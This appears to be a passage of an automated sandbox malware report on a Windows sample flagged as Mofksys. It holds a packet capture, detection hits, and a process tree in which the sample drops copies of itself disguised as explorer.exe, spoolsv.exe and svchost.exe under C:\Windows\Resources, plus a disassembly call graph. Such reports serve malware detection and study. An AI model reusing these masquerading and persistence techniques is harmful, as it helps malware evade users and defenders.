73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                                                                                                                Jul 16, 2022 23:57:43.842511892 CEST2610INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                                                                                                                Statistics

                                                                                                                                                                                CPU Usage

                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                Memory Usage

                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                Behavior

                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                System Behavior

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:0
                                                                                                                                                                                Start time:23:56:37
                                                                                                                                                                                Start date:16/07/2022
                                                                                                                                                                                Path:C:\Users\user\Desktop\sJ9Q8UWMAX.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\sJ9Q8UWMAX.exe"
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                File size:3987229 bytes
                                                                                                                                                                                MD5 hash:7FDB00C80F0250575A05601C08627D50
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:Visual Basic
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000000.00000000.435290439.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                Reputation:low

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:1
                                                                                                                                                                                Start time:23:56:41
                                                                                                                                                                                Start date:16/07/2022
                                                                                                                                                                                Path:C:\Users\user\Desktop\sj9q8uwmax.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:c:\users\user\desktop\sj9q8uwmax.exe
                                                                                                                                                                                Imagebase:0x3d0000
                                                                                                                                                                                File size:3848888 bytes
                                                                                                                                                                                MD5 hash:871EB4B8AEFAEA1113DD3F08B7CB535C
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                • Detection: 3%, Metadefender, Browse
                                                                                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                                                                                Reputation:low

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:2
                                                                                                                                                                                Start time:23:56:47
                                                                                                                                                                                Start date:16/07/2022
                                                                                                                                                                                Path:C:\Windows\Resources\Themes\icsys.icn.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:C:\Windows\Resources\Themes\icsys.icn.exe
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                File size:138316 bytes
                                                                                                                                                                                MD5 hash:0A9BDF90EF50DEF16C6D4C363D0F0B9C
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:Visual Basic
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000002.00000002.490867469.0000000000402000.00000080.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000002.00000000.456086983.0000000000401000.00000080.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: C:\Windows\Resources\Themes\icsys.icn.exe, Author: Joe Security
                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                Reputation:low

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:3
                                                                                                                                                                                Start time:23:56:51
                                                                                                                                                                                Start date:16/07/2022
                                                                                                                                                                                Path:C:\Users\user\Desktop\sj9q8uwmax.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"c:\users\user\desktop\sj9q8uwmax.exe " --local-service
                                                                                                                                                                                Imagebase:0x3d0000
                                                                                                                                                                                File size:3848888 bytes
                                                                                                                                                                                MD5 hash:871EB4B8AEFAEA1113DD3F08B7CB535C
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:low

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:5
                                                                                                                                                                                Start time:23:56:51
                                                                                                                                                                                Start date:16/07/2022
                                                                                                                                                                                Path:C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:c:\windows\resources\themes\explorer.exe
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                File size:138466 bytes
                                                                                                                                                                                MD5 hash:DD8285E811872E2562A43A04A7B27672
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:Visual Basic
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000005.00000000.464382819.0000000000401000.00000080.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000005.00000002.700344270.0000000000402000.00000080.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: C:\Windows\Resources\Themes\explorer.exe, Author: Joe Security
                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                Reputation:low

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:6
                                                                                                                                                                                Start time:23:56:58
                                                                                                                                                                                Start date:16/07/2022
                                                                                                                                                                                Path:C:\Users\user\Desktop\sj9q8uwmax.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"c:\users\user\desktop\sj9q8uwmax.exe " --local-control
                                                                                                                                                                                Imagebase:0x3d0000
                                                                                                                                                                                File size:3848888 bytes
                                                                                                                                                                                MD5 hash:871EB4B8AEFAEA1113DD3F08B7CB535C
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:low

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:8
                                                                                                                                                                                Start time:23:57:01
                                                                                                                                                                                Start date:16/07/2022
                                                                                                                                                                                Path:C:\Windows\Resources\spoolsv.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:c:\windows\resources\spoolsv.exe SE
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                File size:138457 bytes
                                                                                                                                                                                MD5 hash:A97B2BA7591F981B8BBB1CE5E78C8D3A
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:Visual Basic
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000008.00000002.515627841.0000000000402000.00000080.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000008.00000000.485612261.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: C:\Windows\Resources\spoolsv.exe, Author: Joe Security
                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                Reputation:low

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:9
                                                                                                                                                                                Start time:23:57:02
                                                                                                                                                                                Start date:16/07/2022
                                                                                                                                                                                Path:C:\Windows\Resources\svchost.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:c:\windows\resources\svchost.exe
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                File size:138302 bytes
                                                                                                                                                                                MD5 hash:E2A51AD55E5850D878E994E774D44ED1
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:Visual Basic
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000009.00000002.700388006.0000000000402000.00000080.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000009.00000000.487856728.0000000000401000.00000080.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: C:\Windows\Resources\svchost.exe, Author: Joe Security
                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                Reputation:low

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:10
                                                                                                                                                                                Start time:23:57:04
                                                                                                                                                                                Start date:16/07/2022
                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                Imagebase:0x7ff78ca80000
                                                                                                                                                                                File size:51288 bytes
                                                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:11
                                                                                                                                                                                Start time:23:57:10
                                                                                                                                                                                Start date:16/07/2022
                                                                                                                                                                                Path:C:\Windows\Resources\spoolsv.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:c:\windows\resources\spoolsv.exe PR
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                File size:138457 bytes
                                                                                                                                                                                MD5 hash:A97B2BA7591F981B8BBB1CE5E78C8D3A
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:Visual Basic
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 0000000B.00000002.507320494.0000000000402000.00000080.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 0000000B.00000000.505285070.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                Reputation:low

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:12
                                                                                                                                                                                Start time:23:57:22
                                                                                                                                                                                Start date:16/07/2022
                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                                                                                Imagebase:0x7ff78ca80000
                                                                                                                                                                                File size:51288 bytes
                                                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:13
                                                                                                                                                                                Start time:23:57:24
                                                                                                                                                                                Start date:16/07/2022
                                                                                                                                                                                Path:C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\windows\resources\themes\explorer.exe" RO
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                File size:138466 bytes
                                                                                                                                                                                MD5 hash:DD8285E811872E2562A43A04A7B27672
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:Visual Basic
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 0000000D.00000000.534411467.0000000000401000.00000080.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 0000000D.00000002.536439832.0000000000402000.00000080.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                Reputation:low

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:16
                                                                                                                                                                                Start time:23:57:35
                                                                                                                                                                                Start date:16/07/2022
                                                                                                                                                                                Path:C:\Windows\Resources\svchost.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\windows\resources\svchost.exe" RO
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                File size:138302 bytes
                                                                                                                                                                                MD5 hash:E2A51AD55E5850D878E994E774D44ED1
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:Visual Basic
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000010.00000002.563844103.0000000000402000.00000080.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000010.00000000.557848995.0000000000401000.00000080.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                                                Reputation:low

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:18
                                                                                                                                                                                Start time:23:58:15
                                                                                                                                                                                Start date:16/07/2022
                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                Imagebase:0x7ff78ca80000
                                                                                                                                                                                File size:51288 bytes
                                                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high

                                                                                                                                                                                Disassembly

                                                                                                                                                                                Reset < >

                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                  Execution Coverage:6.7%
                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:1.1%
                                                                                                                                                                                  Signature Coverage:8.5%
                                                                                                                                                                                  Total number of Nodes:1667
                                                                                                                                                                                  Total number of Limit Nodes:45
                                                                                                                                                                                  execution_graph 4682 40e840 __vbaChkstk 4683 40e88a 6 API calls 4682->4683 4684 40e931 4683->4684 4685 40ea21 __vbaStrCopy 4684->4685 4686 40e951 11 API calls 4684->4686 4688 40eaa2 __vbaErrorOverflow 4684->4688 4687 40ea6e __vbaFreeStr 4685->4687 4686->4684 4689 40ae40 __vbaChkstk 4690 40ae95 __vbaAryConstruct2 __vbaOnError 4689->4690 4736 404c14 4690->4736 4737 404c1d 4736->4737 4738 40e340 4739 40e37a __vbaOnError __vbaCastObj __vbaObjSet 4738->4739 4740 40e3b8 4739->4740 4741 40e3d4 4740->4741 4742 40e3be __vbaHresultCheckObj 4740->4742 4743 40e3da __vbaFreeObj __vbaCastObj __vbaObjSet 4741->4743 4742->4743 4744 40e409 4743->4744 4745 40e41d __vbaFreeObj 4744->4745 4746 40e40f __vbaHresultCheckObj 4744->4746 4747 40e433 4745->4747 4746->4745 4748 40e447 4747->4748 4749 40e439 __vbaHresultCheckObj 4747->4749 4750 40e467 __vbaStrCopy 4748->4750 4751 40e45c __vbaHresultCheckObj 4748->4751 4749->4748 4752 40e484 4750->4752 4751->4750 4753 40e496 #519 __vbaStrMove __vbaFreeStrList __vbaFreeObj __vbaLenBstr 4752->4753 4754 40e488 __vbaHresultCheckObj 4752->4754 4755 40e505 __vbaExitProc 4753->4755 4756 40e4d9 __vbaRaiseEvent 4753->4756 4754->4753 4758 40e53c __vbaFreeStr 4755->4758 4756->4755 6007 40abc0 __vbaChkstk 6008 40ac15 __vbaOnError 6007->6008 6009 418c90 20 API calls 6008->6009 6010 40ac50 6009->6010 6011 418c90 20 API calls 6010->6011 6012 40ac75 6011->6012 4760 404843 4761 40cf70 __vbaChkstk 4760->4761 4762 40cfc5 __vbaOnError 4761->4762 4763 40d001 __vbaObjSet 4762->4763 4764 40d01f 4763->4764 4765 40d047 4764->4765 4766 40d02a __vbaHresultCheckObj 4764->4766 4767 40d741 __vbaErrorOverflow 4765->4767 4768 40d05f __vbaFreeObj 4765->4768 4766->4765 4769 40d750 __vbaChkstk 4767->4769 4781 40d080 4768->4781 4771 40d7a5 __vbaOnError 4769->4771 4770 40d144 __vbaCastObj __vbaObjSet 4773 40d173 4770->4773 4772 40f9a0 4 API calls 4771->4772 4775 40d7cb 4772->4775 4776 40d19e 4773->4776 4777 40d17e __vbaHresultCheckObj 4773->4777 4774 40d0bc __vbaObjSet 4774->4781 4778 40d7d6 #618 __vbaStrMove __vbaStrCmp __vbaFreeStr 4775->4778 4779 40e12a __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr 4775->4779 4780 40d1a8 __vbaFreeObj 4776->4780 4777->4780 4782 40d841 __vbaStrCat __vbaStrMove 4778->4782 4783 40d82a __vbaStrCopy 4778->4783 4788 40d1c7 __vbaObjSet 4780->4788 4781->4767 4781->4770 4781->4774 4785 40d0ea __vbaHresultCheckObj 4781->4785 4786 40d111 __vbaLateIdCall __vbaFreeObjList 4781->4786 4787 40d864 __vbaInStr __vbaInStr 4782->4787 4783->4787 4785->4786 4786->4781 4789 40e11d #598 4787->4789 4790 40d8ad 4787->4790 4792 40d1e5 4788->4792 4789->4779 4791 40d8cf 6 API calls 4790->4791 4796 40d8c9 __vbaSetSystemError 4790->4796 4882 404c70 4791->4882 4793 40d1f0 __vbaHresultCheckObj 4792->4793 4794 40d20d 4792->4794 4793->4794 4794->4767 4798 40d225 __vbaFreeObj 4794->4798 4796->4791 4800 40d25b 4798->4800 4803 40d390 __vbaNew __vbaObjSet 4800->4803 4804 40d26c 4800->4804 4810 40d3bd 4803->4810 4807 40d298 __vbaObjSet 4804->4807 4808 40d27c __vbaNew2 4804->4808 4824 40d2df 4807->4824 4808->4807 4814 40d3e8 4810->4814 4815 40d3c8 __vbaHresultCheckObj 4810->4815 4817 40d3f2 __vbaFreeObj 4814->4817 4815->4817 4822 40d415 4817->4822 4828 40d440 4822->4828 4829 40d420 __vbaHresultCheckObj 4822->4829 4830 40d307 4824->4830 4831 40d2ea __vbaHresultCheckObj 4824->4831 4842 40d488 4828->4842 4843 40d46b __vbaHresultCheckObj 4828->4843 4829->4828 4835 40d311 __vbaObjSet 4830->4835 4831->4835 4838 40d33f 4835->4838 4840 40d367 4838->4840 4841 40d34a __vbaHresultCheckObj 4838->4841 4844 40d371 __vbaFreeObjList 4840->4844 4841->4844 4842->4767 4846 40d49e __vbaI2I4 __vbaFreeObj 4842->4846 4843->4842 4857 40d4e9 4846->4857 4851 40d6db 4851->4767 4857->4851 4859 40d567 4857->4859 4860 40d547 __vbaHresultCheckObj 4857->4860 4862 40d571 __vbaChkstk 4859->4862 4860->4862 4864 40d5b9 4862->4864 4865 40d5ea __vbaObjSet 4864->4865 4866 40d5ca __vbaHresultCheckObj 4864->4866 4872 40d646 4865->4872 4866->4865 4874 40d651 __vbaHresultCheckObj 4872->4874 4875 40d66e 4872->4875 4878 40d678 __vbaChkstk __vbaLateIdCall __vbaFreeObjList __vbaFreeVar 4874->4878 4875->4878 4878->4767 4883 404c79 4882->4883 4884 40c843 4885 40cc42 __vbaErrorOverflow 4884->4885 4886 40c854 4884->4886 4887 40cc50 __vbaOnError 4885->4887 4888 40cc00 4886->4888 4891 40c87f __vbaObjSet 4886->4891 4889 40ccaa __vbaObjSet 4887->4889 4890 40cc9a __vbaNew2 4887->4890 4888->4885 4894 40ccdc 4889->4894 4890->4889 4893 40c89d 4891->4893 4897 40c8c5 4893->4897 4898 40c8a8 __vbaHresultCheckObj 4893->4898 4895 40ccf1 __vbaObjSet 4894->4895 4896 40cce2 __vbaHresultCheckObj 4894->4896 4899 40cd09 4895->4899 4896->4895 4897->4885 4900 40c8dd __vbaFreeObj 4897->4900 4898->4897 4901 40cd1e __vbaFreeObjList __vbaExitProc 4899->4901 4902 40cd0f __vbaHresultCheckObj 4899->4902 4903 40c8fd 4900->4903 4904 40cd56 4901->4904 4902->4901 4905 40c95c 4903->4905 4906 40c93c __vbaHresultCheckObj 4903->4906 4907 40c966 __vbaChkstk 4905->4907 4906->4907 4908 40c9ae 4907->4908 4909 40c9d6 4908->4909 4910 40c9b9 __vbaHresultCheckObj 4908->4910 4911 40c9e0 __vbaObjSet 4909->4911 4910->4911 4912 40ca18 __vbaFreeObjList 4911->4912 4913 40cbf4 4912->4913 4914 40ca47 4912->4914 4915 40ca8c 4914->4915 4916 40ca6c __vbaHresultCheckObj 4914->4916 4917 40ca96 __vbaChkstk 4915->4917 4916->4917 4918 40cade 4917->4918 4919 40cb0f __vbaObjSet 4918->4919 4920 40caef __vbaHresultCheckObj 4918->4920 4922 40cb6b 4919->4922 4920->4919 4923 40cb93 4922->4923 4924 40cb76 __vbaHresultCheckObj 4922->4924 4925 40cb9d __vbaChkstk __vbaLateIdCall __vbaFreeObjList __vbaFreeVar 4923->4925 4924->4925 4925->4913 4927 40d246 4928 40d741 __vbaErrorOverflow 4927->4928 4929 40d257 4927->4929 4930 40d750 __vbaChkstk 4928->4930 4931 40d390 __vbaNew __vbaObjSet 4929->4931 4932 40d26c 4929->4932 4933 40d7a5 __vbaOnError 4930->4933 4937 40d3bd 4931->4937 4934 40d298 __vbaObjSet 4932->4934 4935 40d27c __vbaNew2 4932->4935 4936 40f9a0 4 API calls 4933->4936 4950 40d2df 4934->4950 4935->4934 4938 40d7cb 4936->4938 4939 40d3e8 4937->4939 4940 40d3c8 __vbaHresultCheckObj 4937->4940 4941 40d7d6 #618 __vbaStrMove __vbaStrCmp __vbaFreeStr 4938->4941 4942 40e12a __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr 4938->4942 4943 40d3f2 __vbaFreeObj 4939->4943 4940->4943 4945 40d841 __vbaStrCat __vbaStrMove 4941->4945 4946 40d82a __vbaStrCopy 4941->4946 4949 40d415 4943->4949 4948 40d864 __vbaInStr __vbaInStr 4945->4948 4946->4948 4951 40e11d #598 4948->4951 4952 40d8ad 4948->4952 4953 40d440 4949->4953 4954 40d420 __vbaHresultCheckObj 4949->4954 4955 40d307 4950->4955 4956 40d2ea __vbaHresultCheckObj 4950->4956 4951->4942 4957 40d8cf 6 API calls 4952->4957 4960 40d8c9 __vbaSetSystemError 4952->4960 4966 40d488 4953->4966 4967 40d46b __vbaHresultCheckObj 4953->4967 4954->4953 4958 40d311 __vbaObjSet 4955->4958 4956->4958 4959 404c70 4957->4959 4961 40d33f 4958->4961 4962 40d93d __vbaSetSystemError __vbaRecAnsiToUni __vbaFreeStrList 4959->4962 4960->4957 4964 40d367 4961->4964 4965 40d34a __vbaHresultCheckObj 4961->4965 4962->4951 4963 40d99c __vbaStrFixstr __vbaStrMove 4962->4963 5028 40ff70 __vbaStrCopy #537 __vbaStrMove __vbaInStr __vbaFreeStr 4963->5028 4969 40d371 __vbaFreeObjList 4964->4969 4965->4969 4966->4928 4970 40d49e __vbaI2I4 __vbaFreeObj 4966->4970 4967->4966 4981 40d4e9 4970->4981 4971 40d9c9 7 API calls 4972 40e1d1 __vbaErrorOverflow 4971->4972 4973 40da8b 7 API calls 4971->4973 4992 40e1e0 4972->4992 4975 40df09 6 API calls 4973->4975 4982 40daf3 4973->4982 4974 40d6db 4974->4928 4976 40df88 __vbaChkstk #689 __vbaStrMove __vbaStrCmp __vbaFreeStr 4975->4976 4977 40e09e #598 __vbaRecUniToAnsi 4975->4977 4976->4977 4979 40e028 4976->4979 4977->4982 4978 40f8f0 4 API calls 4978->4982 4980 40e04a #580 __vbaStrToAnsi 4979->4980 4988 40e044 __vbaSetSystemError 4979->4988 4991 40e07b __vbaSetSystemError __vbaStrToUnicode __vbaFreeStr 4979->4991 4980->4979 4981->4974 4984 40d567 4981->4984 4985 40d547 __vbaHresultCheckObj 4981->4985 4982->4977 4982->4978 4983 40e0d5 __vbaSetSystemError 